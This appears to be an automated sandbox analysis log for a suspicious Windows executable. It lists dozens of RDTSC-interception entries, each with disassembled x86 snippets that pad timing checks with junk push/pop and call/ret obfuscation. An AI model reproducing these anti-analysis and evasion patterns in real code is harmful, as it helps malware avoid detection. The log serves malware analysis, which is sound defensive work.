Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEADF8 second address: AEAE09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEAE09 second address: AEAE3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDFF8F79163h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FDFF8F7915Fh 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEAE3A second address: AEAE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jp 00007FDFF9160A2Ch 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push edi 0x00000014 jnp 00007FDFF9160A26h 0x0000001a pop edi 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jg 00007FDFF9160A2Ch 0x0000002c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB251 second address: AEB269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF8F79163h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB552 second address: AEB557 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB9B0 second address: AEB9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEB9BC second address: AEB9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBB56 second address: AEBB60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDFF8F79156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBC49 second address: AEBC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBD8C second address: AEBD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEBFEA second address: AEBFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEC42D second address: AEC435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEC435 second address: AEC4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FDFF9160A28h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov esi, 200CEFDCh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FDFF9160A28h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 jmp 00007FDFF9160A39h 0x0000004b mov si, di 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 mov dword ptr [ebp+122D17F8h], ecx 0x00000057 pop edi 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007FDFF9160A2Ch 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FDFF9160A2Dh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AECF03 second address: AECF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79165h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED675 second address: AED679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED679 second address: AED687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEE8A6 second address: AEE90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jng 00007FDFF9160A35h 0x0000000c jmp 00007FDFF9160A2Fh 0x00000011 nop 0x00000012 js 00007FDFF9160A2Ch 0x00000018 mov edi, dword ptr [ebp+122D1971h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FDFF9160A28h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D36C6h] 0x00000040 push 00000000h 0x00000042 jg 00007FDFF9160A2Ch 0x00000048 xchg eax, ebx 0x00000049 jp 00007FDFF9160A2Eh 0x0000004f push esi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED687 second address: AED6BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDFF8F7915Ch 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDFF8F79169h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEE62E second address: AEE634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AED6BC second address: AED6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEF20A second address: AEF20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF15C3 second address: AF15C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF15C9 second address: AF1646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov si, 597Ah 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FDFF9160A28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3471h], edx 0x0000002c mov si, 43A1h 0x00000030 add dword ptr [ebp+1244C168h], eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FDFF9160A28h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D17DCh], esi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FDFF9160A30h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF44BA second address: AF44C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDFF8F79156h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF44C5 second address: AF44CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF44CB second address: AF4509 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b jnc 00007FDFF8F79156h 0x00000011 pop eax 0x00000012 pop edi 0x00000013 nop 0x00000014 mov bh, 02h 0x00000016 push 00000000h 0x00000018 or bx, 12FBh 0x0000001d push 00000000h 0x0000001f jmp 00007FDFF8F79161h 0x00000024 mov bx, si 0x00000027 xchg eax, esi 0x00000028 jl 00007FDFF8F79160h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF4509 second address: AF4521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDFF9160A2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF4521 second address: AF4525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF4525 second address: AF452B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF06DF second address: AF06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF06E3 second address: AF0711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDFF9160A36h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF64C7 second address: AF6501 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 2C6FE4B2h 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D3200h] 0x00000017 push 00000000h 0x00000019 call 00007FDFF8F79162h 0x0000001e pop edi 0x0000001f push eax 0x00000020 pushad 0x00000021 je 00007FDFF8F79158h 0x00000027 push edx 0x00000028 pop edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF0711 second address: AF071B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF7498 second address: AF74A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDFF8F7915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF74A2 second address: AF74D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b mov ebx, dword ptr [ebp+122D1919h] 0x00000011 jmp 00007FDFF9160A36h 0x00000016 push 00000000h 0x00000018 mov bh, DDh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007FDFF9160A2Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF74D8 second address: AF74DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF86BF second address: AF86C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFB70D second address: AFB711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFB711 second address: AFB72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDFF9160A2Eh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFB72B second address: AFB731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AADB53 second address: AADB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AADB57 second address: AADB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFDD84 second address: AFDDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 mov di, 2A33h 0x0000000c push 00000000h 0x0000000e jmp 00007FDFF9160A2Eh 0x00000013 sub dword ptr [ebp+124621C3h], edi 0x00000019 push 00000000h 0x0000001b jc 00007FDFF9160A2Bh 0x00000021 mov ebx, 5C21BAA6h 0x00000026 push eax 0x00000027 jbe 00007FDFF9160A34h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFDDBE second address: AFDDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF5690 second address: AF5694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF5694 second address: AF56C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDFF8F79169h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 js 00007FDFF8F79156h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFED2D second address: AFED33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF56C1 second address: AF56DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F79166h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFED33 second address: AFED38 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF56DB second address: AF56DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AFED38 second address: AFED79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jp 00007FDFF9160A2Eh 0x0000000e push 00000000h 0x00000010 clc 0x00000011 mov dword ptr [ebp+122D288Eh], esi 0x00000017 push 00000000h 0x00000019 mov di, 7860h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDFF9160A39h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF6642 second address: AF6646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF6646 second address: AF664A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF881F second address: AF8823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF8823 second address: AF8856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDFF9160A37h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDFF9160A32h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9868 second address: AF986C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF986C second address: AF9876 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF9160A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9876 second address: AF9880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDFF8F79156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AF9880 second address: AF9884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B069D3 second address: B069D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B069D7 second address: B069DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0C85D second address: B0C88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79164h 0x00000009 push esi 0x0000000a jmp 00007FDFF8F79162h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CA0E second address: B0CA34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A38h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FDFF9160A32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CB70 second address: B0CB8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF8F79169h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CB8E second address: B0CB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CB94 second address: B0CBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDFF8F79169h 0x0000000c jns 00007FDFF8F79156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B0CBBA second address: B0CBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B130E2 second address: B130E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B13267 second address: B13279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B13279 second address: B132F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FDFF8F79156h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jl 00007FDFF8F79162h 0x00000016 jmp 00007FDFF8F7915Ch 0x0000001b pushad 0x0000001c jnl 00007FDFF8F79156h 0x00000022 jne 00007FDFF8F79156h 0x00000028 popad 0x00000029 popad 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e jmp 00007FDFF8F79169h 0x00000033 mov eax, dword ptr [eax] 0x00000035 pushad 0x00000036 jmp 00007FDFF8F79167h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FDFF8F7915Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B132F1 second address: B132F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA3923 second address: AA3929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B16C4B second address: B16C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDFF9160A35h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B16C6A second address: B16C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B17255 second address: B17285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FDFF9160A26h 0x00000011 jmp 00007FDFF9160A31h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B17285 second address: B1728F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDFF8F79156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B17403 second address: B1740D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B176C7 second address: B176FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDFF8F79180h 0x0000000f pushad 0x00000010 jmp 00007FDFF8F7915Dh 0x00000015 jl 00007FDFF8F79156h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE94EF second address: AE94F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AE94F9 second address: AE954B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov cx, 3DACh 0x0000000c lea eax, dword ptr [ebp+1247D211h] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FDFF8F79158h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c and ecx, dword ptr [ebp+122D360Ah] 0x00000032 xor dword ptr [ebp+122D225Dh], ebx 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FDFF8F7915Fh 0x00000040 rdtsc
